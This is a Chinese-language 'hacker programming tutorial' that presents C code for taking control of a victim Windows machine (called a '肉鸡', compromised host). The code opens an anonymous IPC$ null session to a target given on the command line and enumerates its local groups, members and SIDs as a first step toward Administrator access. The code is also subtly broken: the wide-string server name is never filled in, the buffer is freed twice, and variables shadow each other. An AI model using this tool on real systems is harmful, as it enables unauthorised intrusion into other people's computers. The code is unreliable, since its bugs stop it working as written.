黑客编程教程(十二)取得系统拥护权限
黑客编程教程(十一)获得系统详细信息我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码.
我们看一下代码:
#include <windows.h>
#include <stdio.h>
#include <lm.h>
#pragma comment (lib, "Mpr.lib")
#pragma comment (lib, "Netapi32.lib")
void getuser(char *);
void main( int argc, char *argv[ ] )
{ //空用户名和密码
DWORD ret;
char username[100] = "", password[100] = "";
char server[100] = "", ipc[100] = "";
NETRESOURCE NET;
if (argc == 1)
{
exit(1);
}
strncpy(server,argv[1],100);
printf("server: %s\n", server);
sprintf(ipc,"\\\\%s\\ipc$",server);
NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;
printf("setting up session... ");
ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);
//建立空连接
if (ret != ERROR_SUCCESS)
{
printf("IPC$ connect fail.\n");
exit(1);
}
else
printf("IPC$ connect success.\n");
getuser((char*)&server);
printf("Disconnect Server... ");
ret = WNetCancelConnection2((char*)&ipc,0,TRUE); //断开IPC连接
if (ret != ERROR_SUCCESS)
{
printf("fail.\n");
exit(1);
}
else
printf("success.\n");
exit (0);
}
void getuser(char *server) //取得用户的函数
{
DWORD ret, read, total, resume = 0;
int i;
LPVOID buff;
char comment[255];
wchar_t wserver[100];
do
{
ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);
if (ret != NERR_Success && ret != ERROR_MORE_DATA)
{
printf("fail\n");
break;
}
PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;
for (i=0; i<read; i++)
{
printf("GROUP: %S\n",info[i].lgrpi1_name);
WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL);
printf("\tCOMMENT: %s\n",comment);
DWORD ret, read, total, resume = 0;
ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);
if (ret != NERR_Success && ret != ERROR_MORE_DATA)
{
printf("fail\n");
break;
}
PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;
for (unsigned i=0; i<read; i++)
{
printf("\t\t%S\n", info[i].lgrmi2_domainandname);
printf("\t\t\tSID:%d\n", info[i].lgrmi2_sid);
printf("\t\t\tSIDUSAGE:%d\n",info[i].lgrmi2_sidusage);
}
NetApiBufferFree (buff);
}
NetApiBufferFree (buff);
}
while (ret == ERROR_MORE_DATA );
}
补充:综合编程 , 安全编程 ,
